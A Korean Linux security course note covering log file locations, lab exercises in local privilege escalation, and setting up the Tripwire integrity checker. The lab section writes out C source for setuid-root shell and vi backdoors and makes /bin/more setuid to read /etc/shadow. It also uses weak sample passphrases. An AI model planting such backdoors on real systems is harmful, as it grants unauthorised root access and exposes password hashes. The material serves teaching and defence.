리눅스 기본 이론(8) - 로그 분석, 백도어 실습, tripwire

오후 1:54 2016-04-29

로그분석

/var 밑에 저장

xorg.o.log 엑스윈도우에 관련된 로그

anaconda.log 페도라 리눅스 설치에 관련된 로그

cron cron 데몬이 도착할 때 발생되는 로그

dmesg 커널에 의한 부팅시 하드웨어 정보와 파일시스템에 대한 로그

lastlog 마지막으로 로그인한 정보(/etc/passwd에 등록된 계정에 대해서만)

messages syslogd와 klogd 데몬에 의해서 발생되는 로그

rpmpkgs 설치된 RPM 패키지 정보

secure 쉘 접속이 발생되는 로그 메시지로그(원격접속과 관련된)

wtmp 사용자의 로그인 정보를 기록

utmp 로그인 접속기록

btmp 로그인 실패기록

yum.log yum으로 설치한 패키지 정보

--------------------------------------------------------------------------

xferlog ftp 홈디렉토리에 저장되면 ftp에 관련된 로그

access.log www 홈디렉토리에 저장되며 httpd에 관련된 로그

실습] 계정 해킹

find / -user root -perm +4000

/usr/libexec/openssh/ssh-keysign

/usr/kerberos/bin/ksu

/usr/sbin/usernetctl

/usr/sbin/ccreds_validate

/usr/sbin/userhelper

/usr/sbin/userisdnctl

/usr/lib/nspluginwrapper/plugin-config

/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper

/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper

/usr/bin/at

/usr/bin/sudoedit

/usr/bin/rlogin

/usr/bin/chsh

/usr/bin/gpasswd

/usr/bin/rcp

/usr/bin/sudo

/usr/bin/crontab

/usr/bin/chfn

/usr/bin/kpac_dhcp_helper

/usr/bin/kgrantpty

/usr/bin/chage

/usr/bin/rsh

/usr/bin/Xorg

/usr/bin/newgrp

/usr/bin/passwd

find: /proc/5821/task/5821/fd/4: 그런 파일이나 디렉토리가 없음

find: /proc/5821/fd/4: 그런 파일이나 디렉토리가 없음

/root/vmware-tools-distrib/lib/bin64/vmware-user-suid-wrapper

/root/vmware-tools-distrib/lib/bin32/vmware-user-suid-wrapper

/sbin/umount.nfs4

/sbin/pam_timestamp_check

/sbin/mount.ecryptfs_private

/sbin/unix_chkpwd

/sbin/mount.nfs4

/sbin/mount.nfs

/sbin/umount.nfs

/lib/dbus-1/dbus-daemon-launch-helper

/bin/mount

/bin/su

/bin/ping6

/bin/ping

/bin/umount

---------------------------------------------------------------------------

#백도어 파일 생성

vi backdoor.c

#include <stdio.h>

main() {

setuid(0);

setgid(0);

system("/bin/bash");

}

저장

컴파일

# gcc -o backdoor backdoor.c

퍼미션설정

# chmod 4755 backdoor

user 계정이 사용가능한 디렉토리로 이동

# mv backdoor /backdoor

6번 터미널에 tel2 계정으로 로그인하여 ./backdoor 명령 실행

실습2] 계정 신분상승 두번째

# chmod 4755 /bin/more

5번 터미널에 tel5 계정으로 로그인하여 cat /etc/shadow 명령을 실행한다.

당근, shadow 파일을 볼 수 없다.

but,(벗드) more  /etc/shadow 명령을 실행한다.

실습3] 계정 신분상승 세번째

vi backvi.c

#include <stdio.h>

main() {

setuid(0);

setgid(0);

system("/bin/vi");

}

저장

컴파일

# gcc -o backvi backvi.c

퍼미션설정

# chmod 4755 backvi

4번 터미널에 tel3 계정으로 로그인한다.

$ ./backvi

$ vi

:!/bin/bash

해결방법은 무결성점검도구이다. (tripwire)

---------------------------------------------------------------------------------------------

http://www.tripwire.com

패키지 다운로드                                                                                   

wget ftp://195.220.108.108/linux/epel/5/i386/tripwire-2.4.1.1-1.el5.i386.rpm

설치

rpm -ivh tripwire-2.4.1.1-1.el5.i386.rpm

또는 

rpm -Uvh tripwire-2.4.1.1-1.el5.i386.rpm

SITE 키 파일 생성(무결성 DB 생성/수정)

# /usr/sbin/tripwire-setup-keyfiles

Enter the site keyfile passphrase: 12345678

Verify the site keyfile passphrase:

Generating key (this may take several minutes)...Key generation complete.

(When selecting a passphrase, keep in mind that good passphrases typically

have upper and lower case letters, digits and punctuation marks, and are

at least 8 characters in length.)

*LOCAL 키파일 생성 (초기화)

Enter the local keyfile passphrase: abcdefgh

Verify the site keyfile passphrase:

Generating key (this may take several minutes)...Key generation complete.

(When selecting a passphrase, keep in mind that good passphrases typically

have upper and lower case letters, digits and punctuation marks, and are

at least 8 characters in length.)

Enter the local keyfile passphrase:

Verify the local keyfile passphrase:

Generating key (this may take several minutes)...Key generation complete.

----------------------------------------------

*CONFIGURATION 파일 생성 (site keyfile 패스워드입력)

Signing configuration file...

Please enter your site passphrase: 

Wrote configuration file: /etc/tripwire/tw.cfg

A clear-text version of the Tripwire configuration file:

/etc/tripwire/twcfg.txt

has been preserved for your inspection.  It  is  recommended  that  you

move this file to a secure location and/or encrypt it in place (using a

tool such as GPG, for example) after you have examined it.

----------------------------------------------

*POLICY 파일생성(site keyfile 패스워드입력)

Signing policy file...

Please enter your site passphrase: 

Wrote policy file: /etc/tripwire/tw.pol

A clear-text version of the Tripwire policy file:

/etc/tripwire/twpol.txt

has been preserved for  your  inspection.  This  implements  a  minimal

policy, intended only to test  essential  Tripwire  functionality.  You

should edit the policy file to  describe  your  system,  and  then  use

twadmin to generate a new signed copy of the Tripwire policy.

Once you have a satisfactory Tripwire policy file, you should move  the

clear-text version to a secure location  and/or  encrypt  it  in  place

(using a tool such as GPG, for example).

Now run "tripwire --init" to enter Database Initialization  Mode.  This

reads the policy file, generates a database based on its contents,  and

then cryptographically signs the resulting  database.  Options  can  be

entered on the command line to specify which policy, configuration, and

key files are used  to  create  the  database.  The  filename  for  the

database can be specified as well. If no  options  are  specified,  the

default values from the current configuration file are used.

*****주의사항*****

twcfg.txt  twpol.txt 파일은 원본과 같이 두지 않는다.(백업 후 삭제할 것)

1. twpol.txt 정책 파일 설정하기

# mv /etc/tripwire/twpol.txt /etc/tripwire/twpol.txt.bak

# cat > /etc/tripwire/twpol.txt

/bin -> $(ReadOnly);

/etc -> $(IgnoreNone)-SHa;

/var -> +pug;

저장

2. 정책파일 인식시키기

# twadmin --create-polfile /etc/tripwire/twpol.txt

Please enter your site passphrase: 

Wrote policy file: /etc/tripwire/tw.pol

3. 무결성 데이터베이스 초기화 및 검사

# tripwire --init

Please enter your local passphrase: LOCAL 패스워드(abcdefgh)

Parsing policy file: /etc/tripwire/tw.pol

Generating the database...

*** Processing Unix File System ***

The object: "/var/lib/nfs/rpc_pipefs" is on a different file system...ignoring.

Wrote database file: /var/lib/tripwire/localhost.localdomain.twd

The database was successfully generated.

4. 데이터베이스 점검 확인

# tripwire --check

Parsing policy file: /etc/tripwire/tw.pol

*** Processing Unix File System ***

Performing integrity check...

The object: "/var/lib/nfs/rpc_pipefs" is on a different file system...ignoring.

Wrote report file: /var/lib/tripwire/report/localhost.localdomain-20160429-160514.twr

Tripwire(R) 2.4.1 Integrity Check Report

Report generated by:          root

Report created on:            2016년 04월 29일 (금) 오후 04시 05분 14초

Database last updated on:     Never

===============================================================================

Report Summary:

===============================================================================

Host name:                    localhost.localdomain

Host IP address:              127.0.0.1

Host ID:                      None

Policy file used:             /etc/tripwire/tw.pol

Configuration file used:      /etc/tripwire/tw.cfg

Database file used:           /var/lib/tripwire/localhost.localdomain.twd

Command line used:            tripwire --check 

===============================================================================

Rule Summary: 

===============================================================================

-------------------------------------------------------------------------------

  Section: Unix File System

-------------------------------------------------------------------------------

  Rule Name                       Severity Level    Added    Removed  Modified 

  ---------                       --------------    -----    -------  -------- 

  bin                             0                 0        0        0        

  (/bin)

* etc                             0                 0        0        1        

  (/etc)

* var                             0                 1        0        0        

  (/var)

Total objects scanned:  3743

Total violations found:  2

===============================================================================

Object Summary: 

===============================================================================

-------------------------------------------------------------------------------

# Section: Unix File System

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

Rule Name: etc (/etc)

Severity Level: 0

-------------------------------------------------------------------------------

Modified:

"/etc/tripwire"

-------------------------------------------------------------------------------

Rule Name: var (/var)

Severity Level: 0

-------------------------------------------------------------------------------

Added:

"/var/lib/tripwire/localhost.localdomain.twd"

===============================================================================

Error Report: 

===============================================================================

No Errors

-------------------------------------------------------------------------------

*** End of report ***

Tripwire 2.4 Portions copyright 2000 Tripwire, Inc. Tripwire is a registered

trademark of Tripwire, Inc. This software comes with ABSOLUTELY NO WARRANTY;

for details use --version. This is free software which may be redistributed

or modified only under certain conditions; see COPYING for details.

All rights reserved.

Integrity check complete.